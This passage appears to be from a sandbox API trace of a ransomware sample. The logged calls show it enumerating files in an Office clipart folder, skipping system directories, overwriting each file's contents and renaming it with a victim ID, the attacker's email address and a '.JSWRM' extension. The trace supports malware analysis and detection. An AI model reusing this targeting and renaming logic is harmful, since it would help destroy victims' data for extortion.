Flags=0x0, Size=0x20) returned 0x240f20 [0098.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00006_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00006_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00006_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0098.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0098.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00006_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00006_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00006_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0098.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0098.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0098.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0098.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00006_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.759] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10090) returned 1 [0098.759] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2760) returned 0x24d210 [0098.759] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2760, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2760, lpOverlapped=0x0) returned 1 [0098.801] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.801] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2760, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2760, lpOverlapped=0x0) returned 1 [0098.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.801] CloseHandle (hObject=0x314) returned 1 [0098.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0098.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0098.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0098.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0098.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0098.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0098.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.802] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00006_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00006_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00006_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0098.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0098.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0098.803] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x228c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TR00095_.WMF", cAlternateFileName="")) returned 1 [0098.803] lstrcmpiW (lpString1="TR00095_.WMF", lpString2=".") returned 1 [0098.803] lstrcmpiW (lpString1="TR00095_.WMF", lpString2="..") returned 1 [0098.803] lstrcmpiW (lpString1="TR00095_.WMF", lpString2="...") returned 1 [0098.803] lstrcmpiW (lpString1="TR00095_.WMF", lpString2="windows") returned -1 [0098.803] lstrcmpiW (lpString1="TR00095_.WMF", lpString2="recovery") returned 1 [0098.803] lstrcmpiW (lpString1="TR00095_.WMF", lpString2="perflogs") returned 1 [0098.803] lstrcmpiW (lpString1="TR00095_.WMF", lpString2="documents and settings") returned 1 [0098.803] lstrcmpiW (lpString1="TR00095_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.804] lstrcmpiW (lpString1="TR00095_.WMF", lpString2="system volume information") returned 1 [0098.804] lstrcmpiW (lpString1="TR00095_.WMF", lpString2="msocache") returned 1 [0098.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0098.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00095_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00095_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00095_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0098.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0098.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00095_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00095_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00095_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0098.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0098.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0098.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0098.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00095_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00095_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.805] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8844) returned 1 [0098.805] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2280) returned 0x24d210 [0098.805] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2280, lpOverlapped=0x0) returned 1 [0098.807] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.807] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2280, lpOverlapped=0x0) returned 1 [0098.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.807] CloseHandle (hObject=0x314) returned 1 [0098.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0098.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0098.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0098.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0098.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0098.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0098.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.808] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00095_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00095_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00095_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00095_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0098.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0098.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0098.808] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TR00097_.WMF", cAlternateFileName="")) returned 1 [0098.809] lstrcmpiW (lpString1="TR00097_.WMF", lpString2=".") returned 1 [0098.809] lstrcmpiW (lpString1="TR00097_.WMF", lpString2="..") returned 1 [0098.809] lstrcmpiW (lpString1="TR00097_.WMF", lpString2="...") returned 1 [0098.809] lstrcmpiW (lpString1="TR00097_.WMF", lpString2="windows") returned -1 [0098.809] lstrcmpiW (lpString1="TR00097_.WMF", lpString2="recovery") returned 1 [0098.809] lstrcmpiW (lpString1="TR00097_.WMF", lpString2="perflogs") returned 1 [0098.809] lstrcmpiW (lpString1="TR00097_.WMF", lpString2="documents and settings") returned 1 [0098.809] lstrcmpiW (lpString1="TR00097_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.809] lstrcmpiW (lpString1="TR00097_.WMF", lpString2="system volume information") returned 1 [0098.809] lstrcmpiW (lpString1="TR00097_.WMF", lpString2="msocache") returned 1 [0098.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0098.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00097_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00097_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00097_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0098.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0098.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00097_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00097_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00097_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0098.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0098.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0098.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0098.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00097_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00097_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.810] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2556) returned 1 [0098.810] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9f0) returned 0x20c6c0 [0098.810] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9f0, lpOverlapped=0x0) returned 1 [0098.811] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.811] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9f0, lpOverlapped=0x0) returned 1 [0098.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0098.812] CloseHandle (hObject=0x314) returned 1 [0098.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0098.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0098.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0098.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0098.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0098.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0098.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.812] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00097_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00097_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00097_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00097_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0098.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0098.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0098.813] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25bc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TR00116_.WMF", cAlternateFileName="")) returned 1 [0098.813] lstrcmpiW (lpString1="TR00116_.WMF", lpString2=".") returned 1 [0098.813] lstrcmpiW (lpString1="TR00116_.WMF", lpString2="..") returned 1 [0098.813] lstrcmpiW (lpString1="TR00116_.WMF", lpString2="...") returned 1 [0098.813] lstrcmpiW (lpString1="TR00116_.WMF", lpString2="windows") returned -1 [0098.813] lstrcmpiW (lpString1="TR00116_.WMF", lpString2="recovery") returned 1 [0098.813] lstrcmpiW (lpString1="TR00116_.WMF", lpString2="perflogs") returned 1 [0098.813] lstrcmpiW (lpString1="TR00116_.WMF", lpString2="documents and settings") returned 1 [0098.813] lstrcmpiW (lpString1="TR00116_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.813] lstrcmpiW (lpString1="TR00116_.WMF", lpString2="system volume information") returned 1 [0098.813] lstrcmpiW (lpString1="TR00116_.WMF", lpString2="msocache") returned 1 [0098.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0098.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00116_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00116_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00116_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0098.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0098.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00116_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00116_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00116_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0098.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0098.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0098.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, 